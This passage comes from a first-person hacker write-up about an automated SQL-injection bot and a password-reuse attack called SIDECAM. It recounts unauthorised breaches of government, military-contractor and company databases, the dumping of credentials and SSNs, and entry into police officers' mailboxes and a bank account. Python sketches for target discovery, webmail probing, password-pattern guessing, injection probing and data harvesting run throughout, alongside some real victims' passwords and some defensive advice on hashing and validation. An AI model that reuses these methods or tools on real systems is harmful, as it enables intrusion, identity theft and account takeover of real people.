can ALONE target flexibly described, most valuable critical infrastructure
points.
This is all a game of probability and time.
For the SIDECAM attack vector, the point is to generate (for example) Google
search query patterns derived from easily configurable regular expressions
describing internet system interfaces - for example job portals, retired
officer portals or any social web application systems provided for critical
infrastructure workers - the places where the most experienced people
willingly stored their email/password data, unaware of the threat.
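Such a query generator can be sketched as a simple cross product of
victim-profile keywords and interface patterns. The lists below are
illustrative placeholders, not the Bot's actual configuration:

```python
from itertools import product

# Hypothetical victim-profile keywords and interface "dorks" - examples only.
KEYWORDS = ["job portal", "retired officers", "members area"]
INTERFACES = ["inurl:login.asp", "inurl:register.asp", "inurl:forgot.asp"]

def generate_queries(keywords, interfaces):
    """Cross every profile keyword with every interface pattern,
    producing one search engine query string per combination."""
    return [f'"{kw}" {iface}' for kw, iface in product(keywords, interfaces)]
```

Each resulting string is then fed to a search engine; the hit lists become
the candidate target pool for the vulnerability matching stage.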
The strength of this attack vector (assuming a randomized-target attacker)
is based on the access level given to the attacker by the sensitive data he
can obtain afterwards, using all the intel and credentials gathered after
breaching the particular victim's mailbox. The more sophisticated the
victim's occupation, the higher the security clearance, the more experienced
the person - the bigger the final attack impact.
Probability works fine in the real world - after stumbling for a few days
across different US .gov domain systems, the bot identified a vulnerable
Texas Department of Justice database system developed to provide various US
DoJ workers with a criminal background checking service. The vulnerability
existed in a 'password reminder' interface. As could have been predicted,
most of the users registered there were law enforcement workers. A 30000+
user account record MSSQL database was then enumerated and selectively
dumped, targeting auto-identified login/password/email records.
The final scanning stage was segment-3's job. It performed automated
password validity matching for the selected email/password combos.
The major part of the DoJ system's accounts were registered by law
enforcement representatives, who presented their official gov-provided mail
account addresses upon registration. Now, since most properly designed
government and military information systems should provide access to email
services ONLY from machines belonging to an internal institution network
(intranet), it is impossible to connect to their login interfaces "from
outside", or without presenting a valid VPN/HTTPS certificate issued by the
CA either for the precise user's machine (secured locally by MS's Data
Protection API) or carried by the user on his/her smartcard.
But again: 'most' doesn't make 'every' :)
Relying again on our new best friends - probability and automation - all we
need is to properly identify whether a particular gov mail domain supports
an external POP3/IMAP server or provides an external webmail interface. The
most often used HTTP/S mail domain prefixes/suffixes found were: 'mail',
'webmail', 'exchange', 'owa' and 'email'.
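The prefix probing described above amounts to building candidate hostnames
and checking whether they resolve. A minimal sketch (the domain is a
placeholder; a real probe would also have to fetch the page and classify the
webmail product):

```python
import socket

# The prefixes listed in the text.
PREFIXES = ["mail", "webmail", "exchange", "owa", "email"]

def candidate_hosts(domain, prefixes=PREFIXES):
    """Build candidate webmail hostnames for a given mail domain."""
    return [f"{p}.{domain}" for p in prefixes]

def resolvable(host):
    """True if the hostname resolves in DNS, i.e. an interface may exist."""
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False
```

Only hosts that resolve (and then answer on 80/443 or 110/143/993/995) are
worth handing to the credential matching stage.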
The results that came up after a day of work or so were, let's say, at least
somewhat unexpected. Several police department and sheriff's department
email accounts were matched as accessible (the password presented to the DoJ
system was reused). The email accounts were provided by either the US or
Canada government and included: a deputy sheriff detective, police
dispatchers, a computer forensics detective, a narcotics division detective
and an information technology division chief.
14. Passwords, secrets and the pain of hashing.
///////////////////////////////////////////////
Nine out of ten systems found vulnerable to the ASP/MSSQL SQLi attack by the
Bot, while holding some form of user password, did not encode the sensitive
values or hash them in any way, storing them in plaintext, using either
'varchar' or 'nvarchar' SQL type fields.
Less than 5% of compromised systems merely encoded sensitive information,
using the mime64 algorithm in most cases, leaving sensitive data easily
reversible after the DB attack. It was really nice, once in a while, to
manually find a secure web system welcoming the user on the 'new account
submission' page with a message like this:
"For security reasons, your password is stored in an encrypted state in our
database, which prevents the system (or anyone else) from reverse generating
your password."
The only way to protect user provided sensitive data - not only from remote
attackers but also from malicious insiders - is to use a strong enough,
one-way, collision resistant algorithm, commonly known as a hash function.
Using up to date hash methods (like SHA-2, for example) protects the user
against any sensitive data leak, whether caused by a remote intruder breach,
an authorized employee's malicious action or accidental data loss.
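A minimal sketch of what "store only the hash" means, using salted SHA-256
per the SHA-2 example above (note: this is an illustration of the one-way
property only - a dedicated password scheme such as bcrypt, scrypt or PBKDF2
with many iterations resists brute force far better than a single hash):

```python
import hashlib
import os

def hash_password(password, salt=None):
    """Store only (salt, digest); the plaintext is never written anywhere."""
    salt = salt or os.urandom(16)  # per-user random salt defeats rainbow tables
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return salt.hex(), digest

def verify_password(password, salt_hex, digest):
    """Re-hash the candidate with the stored salt and compare digests."""
    candidate = hashlib.sha256(bytes.fromhex(salt_hex) + password.encode())
    return candidate.hexdigest() == digest
```

A database holding only (salt, digest) pairs leaks nothing directly usable
after a SQLi dump - and makes a "password reminder" feature impossible to
implement, which is exactly the point.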
Probably the most obvious reason behind this "pain of hashing" reflected in
the numbers is the kindness and generosity of corporations' programmers in
supporting lost users with the extraordinarily powerful 'password reminder'
feature.
But, seriously.
I cannot say whether the "password reminder" option is simply GOOD or BAD -
it's not black or white.
But it is a bad policy.
The only thing I can say, to be objective, is that the option implemented
for the "users' good" is far less secure than its completely reasonable
alternative - the password reset feature. First, user password plaintext
data may be harvested (and decoded) as a result of a SQL Injection
compromise of the vulnerable corporation's database. Secondly, the password
may be intercepted/retrieved by any attacker who gained access to the
victim's email account credentials (exploiting, for example, successful
SIDECAM attack result data). And finally, after breaching a user's mailbox
account, an attacker can exploit the "password reminder" features of ANY
particular system that the victim has registered to and take control of the
accounts.
The existence of a password reminder service is in fact real evidence (and
the only evidence the attacker would need) that the web application doesn't
use any type of sensitive data (password) hashing but stores the data as
plaintext (since for a properly constructed hashing algorithm there is no
(mathematical) way to "recover" the hash operation's input argument from the
result value).
Going further - in my opinion, at no point, to be honest, should a user be
given the option to provide a remote, critical assets system (like online
banking or official government mailboxes) with HIS OWN password, neither
during account registration nor at a password reset operation. We are just
humans, and a human doesn't execute every single policy given, as a robot
does with scripting code. The password may be too short, it may lack
randomness (be vulnerable to brute-force attack) and, most of all, after a
possible compromise of the database system it may reveal too much
information about the "cryptographic inner life" of the user. A very short,
dictionary based, character-only password would for example indicate either
the user's recklessness or his unawareness of security threats.
Let's take a real life password example: 'susan1'.
The password was found to match the corresponding email address by S3 using
the SIDECAM attack vector. The password indicates three things: first, that
the owner likes Susan :) second, that most likely he is male, and finally -
most important to an attacker - that (in this specific example) he
intentionally concatenated the word 'susan' with the digit '1' without being
told to do so by the remote system (the particular system's (email portal's)
password policy didn't force the user to use numbers or special characters),
which leads us to the conclusion that the user:
1. Is aware of password complexity attacks and could have used the hybrid
password to protect one of his more critical assets, i.e. his mailbox.
2. Still uses a rather short password, most probably to memorize it easily.
That all together indicates that the user's "security phrase pattern" was
used to lock up his "things" in more than just one place, and it could be
expected (with reasonable probability) to be a combination of the word
'susan' and a digit, most likely ranging between 1-5.
After about an hour of getting to know the user better while talking with
susan1, two other accounts could be accessed - the user's second mailbox
password was pattern-bruteforced and verified to also be the keyword
'susan1', and the online bank account used by the user (first level of
authentication only / non-cash operations) was identified to be protected by
the password 'susan3'.
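The "base word plus a low digit" pattern brute force described above can be
sketched in a few lines - a hypothetical illustration of the candidate
generation only, not the Bot's actual code:

```python
def pattern_candidates(base, digits=range(1, 6)):
    """Generate 'susan1'-style variants: the bare base word,
    then the base word concatenated with each low digit."""
    yield base
    for d in digits:
        yield f"{base}{d}"
```

Six guesses per account is well inside any realistic lockout threshold,
which is what makes this kind of pattern reuse so cheap to exploit.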
Another real life example - a Mensa Poland member's mailbox, accessed by the
Bot, was noticed to be protected by the password 'dupa' (meaning 'ass' in
Polish). The conclusion here, however, was slightly more difficult than in
the previous example. The best I could come up with was: the higher the IQ,
the stranger the password...
Definitely the most ironic case, however, was the AOL user who had chosen to
protect her electronic accounts (including the one within a buggy, SQLi
targeted portal) along with her AOL email account, all together, with the
same password: 'idiot1'.
The unencrypted password records stored in a vulnerable database should not,
after all, be considered the most critical user asset to be protected.
Judging by the systems the Bot gathered, many of them stored another
sensitive data type in plaintext - secret questions and answers.
Analysing SIDECAM-opened mailboxes, an attacker already knows that the user
used the single well memorized password in at least two different places.
With the reasonable assumption that the mailbox owner also uses similar
"secret question" / "answer" strings for more strongly protected systems,
and with the help of additional personal information like DoBs, addresses,
phones or even SSNs stored within the victim's mailbox documents (CVs
attached to job emails are true personal information mines), an intruder can
try to conduct a successful attack against strongly protected victim
accounts that the attacker is already aware of, after studying the victim.
15. Parametric Data Objectives.
//////////////////////////////
To be able to "tell" the bot which type of data within every penetrated
database system we are interested in and which is unimportant, a simple
mechanism has been implemented to describe it - "Parametric Data
Objectives". The idea is to bind the public parts of the targeted data with
their corresponding private values. For example, if we'd like to tell the
bot to look for any ID data containing a specific secret element (say an
SSN), we describe it by defining a list of string patterns for both the
public and the private part. We define a DOP scheme by NAME and then
describe the lists of Key and SubKey strings that follow this pattern (i.e.
contain one of the Key/SubKey words).
Example from config:
Key = ssn ss_n ssan social_security socialsecurity
SubKey = email name tel addr phone dob year ammount number date time code
user country
The whole idea is that data keys must be bound to at least one subkey -
without that, the accessed data has no value to a particular attacker. Let's
say we are interested in any table containing Password/Email columns - we
need to tell the code what a login column name could look like and,
moreover, what different column it should be bound to, to be valuable.
Therefore, even if the robot manages to find the email records within the
penetrated system but cannot match them with corresponding password values
(cannot locate a related password column by either name or content matching)
or secret data - they are useless to it as long as it employs the SIDECAM
vector only (seeking automated email account breaching).
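The Key/SubKey binding rule can be sketched as a column name matcher - an
illustrative reimplementation of the idea, not the Bot's code, with the
string lists adapted from the config example above:

```python
KEYS = ["ssn", "ss_n", "ssan", "social_security", "socialsecurity"]
SUBKEYS = ["email", "name", "tel", "addr", "phone", "dob", "year", "amount",
           "number", "date", "time", "code", "user", "country"]

def match_columns(column_names, keys=KEYS, subkeys=SUBKEYS):
    """Return (key columns, subkey columns) if a table holds a Key column
    bound to at least one SubKey column; otherwise None - a Key with no
    SubKey bound to it is worthless to the attacker."""
    lower = [c.lower() for c in column_names]
    key_hits = [c for c in lower if any(k in c for k in keys)]
    sub_hits = [c for c in lower if any(s in c for s in subkeys)]
    if key_hits and sub_hits:
        return key_hits, sub_hits
    return None
```

A table exposing only `cust_ssn` with no bound identity column is skipped;
one exposing `cust_ssn` next to `email_addr` is flagged for harvest.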
For an attacker there is, however, a different possible way to exploit
separate email address records not bound to plaintext passwords: spear
phishing.
Utilizing the SQL Injection attack vector as the first stage of a spear
phishing attack is in fact a textbook example.
Besides the mechanism describing the "priority data" pattern (DOP, at the
Bot's Segment-2), a second pattern-description mechanism was developed (at
Seg-2) to parametrically define the most critical systems (like military,
gov, financial, health, energy, IT, etc.) to search for vulnerabilities in
and to distinguish them from less critical infrastructure.
16. Robot Hits His Postgrade Education.
//////////////////////////////////////
Before the next Bot version, which implemented additional solutions like
Data Objective Patterns, could be launched, it needed proper training of
course :)
However, it had already been a month or two since the last bot's live
reconnaissance and "hunt" for vulnerable systems, so I figured it was a
great time to find out how many of the database systems initially matched as
vulnerable had already been patched (without, obviously, notifying the
company/organization about the fact of the vulnerability's existence in any
formal way).
The first thing I did was to set up a DOP to harvest every recognized
login/email/password triplet as well as any personal ID data (address,
phone, DOB, etc.) bound to SSNs.
Then I cleared the 'done' flag for the same security / private investigation
company mentioned earlier (the one the second Bot version utilized as a
training ground for automated penetration testing) and launched the robot.
Based on the output data gathered by the previous version of the Bot, the
company database held about 30 employee records containing private SSN/ID
data and a few hundred client records with email/password/login combos, so
the new bot's automation should have performed successfully without any
human supervision, recognizing these data entries as matching the configured
DOPs and performing an automated data harvest.
But it didn't...
The penetration stopped at the vulnerability matching procedure - it seemed
that the company had patched the hole.
Anyway, since an automated code's console printout is not enough to confirm
whether the hole in my favourite security training :) company had indeed
been patched (I could simply have made a ton of bugs in the new bot's code,
so it could just be malfunctioning), I needed to check it myself using
oldschool script-kiddie ninja techniques. It turned out the vulnerable HTML
FORM had indeed been fixed, but since the Bot doesn't implement any
sense-of-humour recognition algorithms (yet...), it obviously missed one
precious detail of the company's patch.
Previously, if the user had forgotten his credentials, for example, the
login interface would warn him, in a big red font, that "The provided
password is incorrect". Now, the fix for the SQLi bug consisted entirely of
an input parsing procedure that checked whether the user input contained
either the 'select' or 'union' SQL keyword (the words that had been
SQL-injected into the very same database something like 5 times a second,
for a few days, a month earlier while "training" the bot). The stunning part
was the ASP programmers' coded-in response to the recognized SQL word
patterns. After using either the "select" or "union" keyword in the
Login/Password fields, right in the place of the common incorrect-password
warning message, in the same big red font, we were now given a big red:
"GO AWAY!"
Well... I guess if no other automated penetration bot had trespassed on the
company's database last month, it was quite probable that this message was
meant explicitly for the Bot.
The second, disturbing part of the case was the fix itself. Although the
faulty 'customer login' interface had in fact been patched, it took about
60 secs to find another penetration entrypoint - the vulnerable 'password
forgotten' FORM. After redirecting the Bot to the new entrypoint it
harvested all the DOP configured data successfully, while taking it to heart
to "go away" from the 'Customer Login' interface and to never, ever use that
entrypoint again while penetrating this particular system.
Some time later I tried to analyse a random group of previously penetrated
and vuln-matched systems selected from the Bot's printouts. It seems that
approximately 8 out of 10 database systems that had been scanned, penetrated
and data-harvested 3-6 months earlier either did not fix the hole, fixed it
improperly or didn't take the effort of wide-scanning the whole web app for
other, similar attack vector vulnerabilities.
Since NONE of the owners of the Bot-penetrated systems were ever informed
about the successful/unsuccessful compromise attempts on their systems,
these numbers would only indicate that either the intrusion detection
infrastructure or the incident response procedures in the penetrated
institutions leave a great deal to be desired.
A very similar example to the security training corp's case was an
Australian telecommunication company's system providing commercial
anonymous SMS services. Identified over 6 months earlier as vulnerable by
the first version of the bot - and open to client sensitive information
theft as well as client SMS credit limit manipulation / SMS service
exploitation - it had now been completely rebuilt (it had that whole new,
sharp-looking graphic design). The entire web page frontend style was
changed and the SQL Injection hole in the 'Logon' interface had been
properly patched. However, just as in the previous case, the 'Password
Reminder' service was left with the very same kind of ASP-based SQLi hole
that the 'Logon' interface had contained before, opening the whole database
system back up for R/W access.
This again suggests that the SQL Injection based attack vector is sometimes
either wrongly understood by web application developers, or understood only
through shortsighted "how to hack web apps in 60secs" tutorials (which
describe how to crack a system, not how to protect one from being cracked)
- tutorials that can in fact be read as: "If you properly secure just your
ASP web application's LOGON interface then you are safe against any SQL
Injection, because ASP SQL Injection <IS> just login based".
17. Enumerating Penetration Entrypoints
///////////////////////////////////////
One of the main goals of the research was to establish the numbers behind
every particular victim-pattern, using different automated search engine
query generators. Three generators were constructed: one for the standard,
long-exploited 'Login' interface, one for the 'Forgot Password' interface,
and finally one for the 'User Registration' interface.
Analysis of the Bot-gathered data shows comparatively low positive counts
(target web systems matched as vulnerable) for the plain "login.asp"
tutorial-case pattern, higher counts for patterns like "logon.asp",
"log_in.asp", "signin.asp", "log_me_in_god_damnit.asp" and their
permutations, and finally the highest for "register.asp" and
"forgotpassword.asp".
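The three generators themselves aren't published here; a hypothetical
Python sketch of the kind of filename permutation generation described
(stem list and separators are my own assumptions) could look like:

```python
# Hypothetical sketch: generate search-engine query patterns for common
# ASP entrypoint filenames, including "_"-separated two-word variants.

def dork_patterns():
    variants = {"login", "logon", "signin", "register", "forgotpassword"}
    for sep in ("", "_"):
        variants.add("log" + sep + "in")        # login, log_in
        variants.add("sign" + sep + "in")       # signin, sign_in
        variants.add("forgot" + sep + "password")
    # Quote each pattern the way a search engine query would.
    return sorted('"%s.asp"' % v for v in variants)

patterns = dork_patterns()
assert '"login.asp"' in patterns
assert '"log_in.asp"' in patterns
assert '"forgot_password.asp"' in patterns
```

Each emitted pattern then becomes one search query whose result links feed
the Bot's target queue.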
The last group - password reminder web interfaces - was, for example,
statistically the most successful way to compromise government owned
database servers.
There seem to be at least two main reasons behind these numbers: a certain
misunderstanding of the nature of common SQL query execution, and the echo
of the malicious "penetration storms" that have swept through database
systems over the past decade.
Well documented search-and-quickly-exploit recipes, like "login.asp"
googling and the infamous "'or 1=1" sequence used as an authorization
bypass magic word, have likely been used more actively by script-kiddies
and by automated scanning code following that search pattern. After such
script-kiddie-conducted attacks (usually with malicious/destructive
purposes, but low-effort goals) the compromise effects were usually quickly
noticeable, triggering a rapid reaction from the victim
(detection/patching), as the impact of the attack was either database
contents alteration or destruction. Therefore most of the systems following
the tutorial-described patterns already have their unfriendly pen-testing
behind them, and so the final positive count in that group is statistically
lower.
You could tell that most of the programmers behind the systems belonging to
the critical infrastructure group are perfectly aware of the SQLi attack
threat as well as of its possible impact on a system. Many of the systems
found vulnerable to the attack vector had well-implemented validation on
almost every submitted data field - plus some sort of "scarecrow" bonus for
script-kiddies - while still leaving one or two other substantial
client-to-server input interfaces improperly escaped. These unnoticed
connections between user input and server-side command execution left the
particular company's web infrastructure open to penetration.
A quite funny coincidence happened shortly after testing of the first query
generator (the 'login' interface name permutation generator) began. The
Bot's S1 logged by mistake a YouTube movie link, indicating that it matched
a '"login.asp"+video' potential HTTP system target pattern. Nothing
surprising there, however, since the movie contained a tutorial for an SQL
Injection driven MSSQL server attack. The video description added by the
uploading user contained the phrase "login.asp", so it had been indexed by
Google's robots and found by the Bot. Ironically, however, the tutorial
claimed that when searching for an SQL Injection victim there is no value
in looking at any interfaces other than system administration login
frontends, as they are supposedly the only way to compromise a system.
Since we already know that remote SQL command execution may be triggered at
any server-side user input processing interface - it needs to be neither an
admin-login portal nor a login interface at all - this finding of the Bot
wasn't a false-positive after all :)
The second most common place to find command injection vulnerabilities was
the "user registration" interface. The web application programmer needs to
compare the user-provided application-unique identifier
(USERNAME/EMAIL/AgencyID) with the ones already existing in the DB, and
display an error message if needed. Since the only practical way to do this
is with an SQL query, another entrypoint type was introduced into the Bot's
code.
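The systems in question run ASP against MSSQL; as a minimal stand-in, a
Python/sqlite3 sketch of that registration "is this username taken?" query
shows both the vulnerable string-concatenation form and the parameterized
form that closes the hole:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

def taken_vulnerable(name):
    # String concatenation: the attacker's quote breaks out of the literal.
    q = "SELECT COUNT(*) FROM users WHERE username = '%s'" % name
    return conn.execute(q).fetchone()[0] > 0

def taken_safe(name):
    # Parameterized query: input can never change the SQL structure.
    q = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(q, (name,)).fetchone()[0] > 0

payload = "x' OR '1'='1"
assert taken_vulnerable(payload)   # injection: the OR clause matches every row
assert not taken_safe(payload)     # same string treated as plain data
```

The duplicate-check query is exactly as injectable as a login query - which
is why "register.asp" scored so high above.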
A perfect example is one of the U.S. Department of Agriculture (USDA)
database systems, with well designed code employing illegal character
filtering at the main login interface - even warning the user about any
recognized SQL Injection attempt.
But again - the User Registration interface designed for U.S. based
companies doesn't properly check its User ID field: the server-side code
does not escape the user's special character input before comparing the
proposed ID value with the ones already stored in the database to check for
possible duplicates - rendering the system exploitable through the attack.
An interesting, different type of SQL Injection "pin-point" was spotted by
accident during an early phase of the research.
The first version of the Bot found a hole in a major Polish commercial
email portal. A few hours after the system had been probed, matched as
vulnerable by the Bot's S2, and handed over to the penetration worker-queue
for further database contents scanning and DB structure enumeration, the
vulnerability was patched. Unfortunately S2 didn't manage to gather any
additional info about the database structure and contents, because all its
workers were busy at the time.
After I noticed that particular system penetration some time later, while
analysing a few days of the Bot's logs, together with a friend we decided
to "check out" whether the company's programmers hadn't missed anything...
After an hour or less my friend noticed (thx Sl4uGh7eR, btw) that
concatenating an apostrophe to the '.asp' file name within the browser URL
produced an HTTP 500 error containing our favourite MSSQL 0x80040e14 syntax
error. Now the only question remaining was: why?
After a quick investigation the case became quite clear - the remote server
application employed a mechanism to validate every client's HTTP file
request, matching it against a database-stored dynamic list of files that a
user is allowed to request.
Since such code obviously needs to match the filename requested by a
particular HTTP GET against the ones stored in the database, it also needs
to execute somewhere an SQL query containing the client-provided URL string
- which, if not escaped correctly, is all the attacker needs.
And so the Bot gained another, third HTTP based SQL Injection pin-point
type, alongside HTTP/POST based HTML FORM variable fuzzing and HTTP/GET
parameter fuzzing.
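That third pin-point probe boils down to: append an apostrophe to the
requested .asp path and look for the MSSQL syntax-error signature in the
response. A hypothetical sketch of the two pure helper steps (URL building
and response matching), leaving the actual HTTP request out:

```python
# Hypothetical probe helpers; signature strings are the classic MSSQL
# error markers, not taken from the Bot's actual code.
ERROR_SIGNATURES = ("80040e14", "Incorrect syntax near")

def probe_url(url: str) -> str:
    """Build the probe URL: concatenate an apostrophe to the .asp filename."""
    path, _, query = url.partition("?")
    return path + "'" + (("?" + query) if query else "")

def looks_injectable(response_body: str) -> bool:
    """Heuristic: response body carrying an MSSQL syntax-error string."""
    body = response_body.lower()
    return any(sig.lower() in body for sig in ERROR_SIGNATURES)

assert probe_url("http://host/page.asp?id=1") == "http://host/page.asp'?id=1"
assert looks_injectable("Error 0x80040e14: Incorrect syntax near 'page.asp'")
assert not looks_injectable("HTTP 404 - File not found")
```

One HTTP GET per candidate page, one substring scan of the body - cheap
enough for a crawler to run against every URL it sees.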
But the cat-and-mouse play continued. A week after the last friendly
pentesting the hole was patched, again however missing the point of the
issue and still enabling an intruder to perform a successful Blind SQL
Injection attack. Since the objective of this project was obviously not
ravage and server takeover - just research, numbers and attack vector
mutation possibilities (and also lowering a little my ignorance of the SQL
language) - after implementing the new vulnerability-testing pin-point type
into the Bot, I decided to close the case of the Polish hosting company.
It came back to me, however, quite quickly.
The first bot version, which spotted the vulnerable company's system,
didn't yet implement a crucial feature - enumeration of every OTHER
database (not just the one queried by the vulnerable ASP script code)
hosted on the DB server and accessible through the vulnerable web
interface.
The feature was implemented later, in the last major Bot version. During
the final month-long runtime it spotted a minor vulnerable website's
database, serving the Polish barbers industry. After enumerating all the
other databases accessible on that vulnerable MSSQL server using the same
db-user account as the barbers portal login interface, it amazingly came
out that the server was the VERY SAME db-server belonging to the previous
major Polish hosting company, hosting 94 other R/W accessible databases,
including for example the website of the biggest Polish international
cycling race - the "Tour de Pologne".
Since all the server-hosted databases were administered and serviced by
that single hosting company, all of them were protected by the SAME db-user
account, rendering every database hosted there R/W accessible through that
single minor barber portal - including the WWW/FTP customer account
credential database, the company financial operations database (customer
credit card data), and so on.
It should also be mentioned - even if it's too obvious - that the SQL
Injection attack vector does not even have to be HTTP based. The
vulnerability can be exploited via any kind of user data entrypoint
(protocol) designed to transport input to the remote client/server
application for final processing. No matter what, proper server-side
'processing' of that input is the key to staying secure or getting
compromised in the future.
18. Obscurity != Security
/////////////////////////
"If it runs, it can be broken" - every software protection cracker's
favourite phrase. It's quite simple actually - every locally runnable code
is reverse-engineerable and can be re-sculpted into anything else, limited
only by the cracker's imagination.
The same rule applies to client-side-only web app protections and code
obfuscation.
An interesting observation was made during the bot's runtime and afterwards
while analysing the vulnerable system entrypoint list. It seems that many
of the more heavily client-side protected web applications that were
nevertheless matched as penetrable by the bot were either government or
military systems. And to be clear: by "heavily" I mean roughly a higher
amount and sophistication level of the code responsible for CLIENT SIDE
user input validation.
For example, the second version of the bot found and penetrated a quite old
but still operational DoD owned system belonging to one of the US Air Force
contractors - Lockheed Martin. The JScript code there employed a
timer-based input validation protection that is really annoying for an
attacker - "annoying", of course, for a human attacker with browser
scripting turned on... :)
Trying to disable the input validation timers manually, using for example
the Firefox Firebug plugin, would be a real pain in the ass, as the timer
validation procedures were embedded into different HTML tags and
cross-triggered each other, causing the loss of FF's input focus after
every improper character pressed (btw: huge applause for their programmers'
imagination).
From the bot's perspective, however (ie: from its "handicapped"
robot-perspective), the whole JS code built by the system's programmers is
pretty irrelevant - since the bot doesn't employ any JS engine to execute
the retrieved HTML scripts, searching instead directly in the HTML and its
subframes for every submittable FORM tag, this validation code was simply
an excessive piece of HTML encoded text. After matching the system as
positive for SQL Injection, the bot built and stored the penetration
entrypoint description. Right after that, S2 successfully penetrated it and
dumped about 3K Email/Pwd/SSN record entries of US Air Force cadets and
officers.
Every client side software protection providing input data validation can
be reversed and disabled.
Thus, server-side input filtering IS A MUST in any secure web app.
Client-side FORM field data validation searching for invalid characters has
no real value as a security mechanism. Obviously, it serves very well as a
data syntax validity double-check, as well as the first line of defense
against annoying script-kiddies (like me for example:) typing one magic
injection word into every queried google link, looking for single-hit
"world domination" internet doors.
Using tools built for browser-side session data manipulation, like the
Firebug plugin for FF or the WebScarab http-proxy tool, one can quickly
bypass protections of this kind. Automated internet robots in particular,
using their own HTTP-payload processing, can do with the client side script
code pretty much anything the bot's programmer wishes them to do - ranging
from validation code autodetection up to selective execution.
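The bot's behaviour described above - ignoring every script and simply
collecting submittable FORM fields from the raw HTML - can be sketched with
Python's stdlib parser (my own illustration, not the Bot's parser; no JS
engine involved):

```python
from html.parser import HTMLParser

class FormScraper(HTMLParser):
    """Collect each FORM's action plus its input field names, ignoring JS."""
    def __init__(self):
        super().__init__()
        self.forms = []  # list of (action, [field names])

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("action", ""), []))
        elif tag == "input" and self.forms and a.get("name"):
            self.forms[-1][1].append(a["name"])

html = """
<form action="/login.asp" onsubmit="return validate()">
  <script>function validate(){ /* timer-based checks */ }</script>
  <input name="user"><input name="pwd" type="password">
</form>
"""
s = FormScraper()
s.feed(html)
assert s.forms == [("/login.asp", ["user", "pwd"])]
# The harvested (action, fields) pair is all a bot needs to POST a payload
# directly - every client-side validation timer is simply dead text to it.
```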
On the other hand, one good way to stop a fully automated robot (a
vulnerability probing robot) on its web-app crawling/scanning road would be
a captcha implementation. Robot code behaves as blindfolded as only a
machine can. Of course, a business-time consuming implementation of
additional anti-robot functionality like this, without focus on the true
bottom of the issue, ie. application security assessment, would be
shortsighted. Obviously, while a captcha won't stop any human auditor
conducting precise web-app pentesting ordered by a customer company, it
will definitely stop a robot from either fully enumerating the web-app
interface or progressing with a specific interface fuzzing process.
Another interesting, yet still powerless, protection facing an SQL
Injection vulnerability was an SMS based 2-factor web authentication
solution, implemented by a Johannesburg based college, which handled parent
authentication logon to a child education progress monitoring system.
The Bot, in its early second version, tracked down the vulnerability,
accessing without any trouble sensitive ID data belonging to both students
and their parents (email/password combos, names, phones). Despite the
obvious threat of ID theft and mailbox hijacking by criminals, SQL
Injection can be used here in a quicker way - to manipulate the SMS phone
number records and gain unauthorized access to the system.
The authentication implemented there had two steps.
In the first, the parent was asked to provide their Parent_Code, ID_Number,
Email_Address and Password. Then, using the phone number stored in the
database (at registration), the server-side application sent a special
security code to that phone number and asked the user to enter it at the
second logon screen, before granting access to the monitoring services.
However, by exploiting R/W access to the database records, a malicious
entity can easily change any particular parent's phone number to a desired
one, redirecting as a result the SMS containing the Security Code.
19. Learning new tricks from your own code
//////////////////////////////////////////
Shortly before the end of the final Bot testing month, during some early
October morning, it found an entrypoint into a vulnerable HP customer
support web database. Since the tool was running silently without my
supervision (the time of the initial system vulnerability match, followed
by an automated penetration, was something like 4AM here in my country,
while I was sleeping deliciously), over a week passed until I decided to
look over the recent data gathered by the Bot.
When I spotted the HP penetrated system's printout in the tool's output
logs, my attention was attracted by the list of databases stored on that DB
server. It contained Intel's, AMD's, HP's as well as about 20 other
"bigger" company customer databases. It seemed that the server belonged to
some IT outsourcing company which offered its customers DB-server hosting
services.
Unfortunately all I had before me was the server's database name list and
its structure - it seemed that the Bot didn't recognize any potentially
"interesting" (DOP specified) data on the server (at the time it was
configured to look only for login/email/password combos) so it did not
"decide" to perform a further data-harvest. Still, after a quick human
analysis, it seemed that some of the accessible databases contained tables
with column names suggesting sensitive customer information. Obviously I
had to do a quick "manual" check to be sure :)
Launching web browser -> copy-pasting the vulnerable system URL -> entering
manually the SQL query sequence into the input field enumerated earlier by
the Bot and ... here goes nothing. Ehmmm.
Has the system been patched already?
Well. Uhmmmmmm. OK.
Good for them.
The guys did their job well and patched the system after noticing Bot's
friendly "pentesting visit" last week.
So I thought...
First of all, you must agree that the teaching-dependency-line linking the
programmer with his penetration testing robot is rather unidirectional :)
I mean, it is the coder's duty to teach the code all the tricks he knows in
order to create an automated attack robot. In other words - vulnerability
recognition errors are meant to be the domain of the machine, not the
human. So if you write a program telling it how to enumerate and penetrate
a system, then the code finds a system and says "I've matched an entrypoint
to the database at web interface X" - and some time later you try to access
the database manually at the very same entrypoint specified by the code but
nothing happens... the answer is obvious: the system has been patched.
Right?
In other words: it couldn't have been you - the teacher - who made a
mistake validating the entrypoint's security, since all the tricks the code
knows are your tricks ... :)
But this was a system hosting databases of Intel, AMD and Cisco...
I mean, you just have to be sure, to sleep well, that they didn't fix just
one particular entrypoint leaving another one unpatched. A quick check of
all the other input fields - password reminder interface, submit new
account interface, website search interface - nope. Nothing. The vuln has
been fixed.
So the last thing (but, you could say, completely unnecessary - based on
what has been said earlier) was to order the bot to target the system again
and repeat the penetration test from a week before. So, we launch the
config, clear the "pen-test-done" flag by the system's url entry and wake
the Bot.
20091128125443 Initializing Ellipse 0.4.73 SEG-2
20091128125443 Cleaning up abandoned VlnConn targets...
20091128125505 Op mode: 0
20091128125505 Mutex ID: VLNDET-MTX-001
20091128125505 Entering MainLoop...
20091128125525
20091128125525 [ SYSTCH ] Connecting system at >>
20091128125525 [ SYSTCH ] http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
20091128125525
20091128125528 [ SEG2 ] Initializing Entrypoint Search...
20091128125528 [ SEG2 ] Entrypoint #1 found
20091128125528 [ VLNCONN ] Going processing level: 0x20
20091128125528 [ VLNCONN ] Running initial passive vuln detection...
20091128125534 [ VLNCONN ] Passive-Scan result: Negative
20091128125534 [ SEG2 ] Entrypoint #2 found
20091128125534 [ VLNCONN ] Running initial passive vuln detection...
20091128125538 [ VLNCONN ] Passive-Scan result: POSITIVE
20091128125538 [ VLNCONN ] Going processing level: 0x21
20091128125538 [ VLNCONN ] Running active vuln detection...
20091128125543 [ VLNCONN ] Scan result: POSITIVE
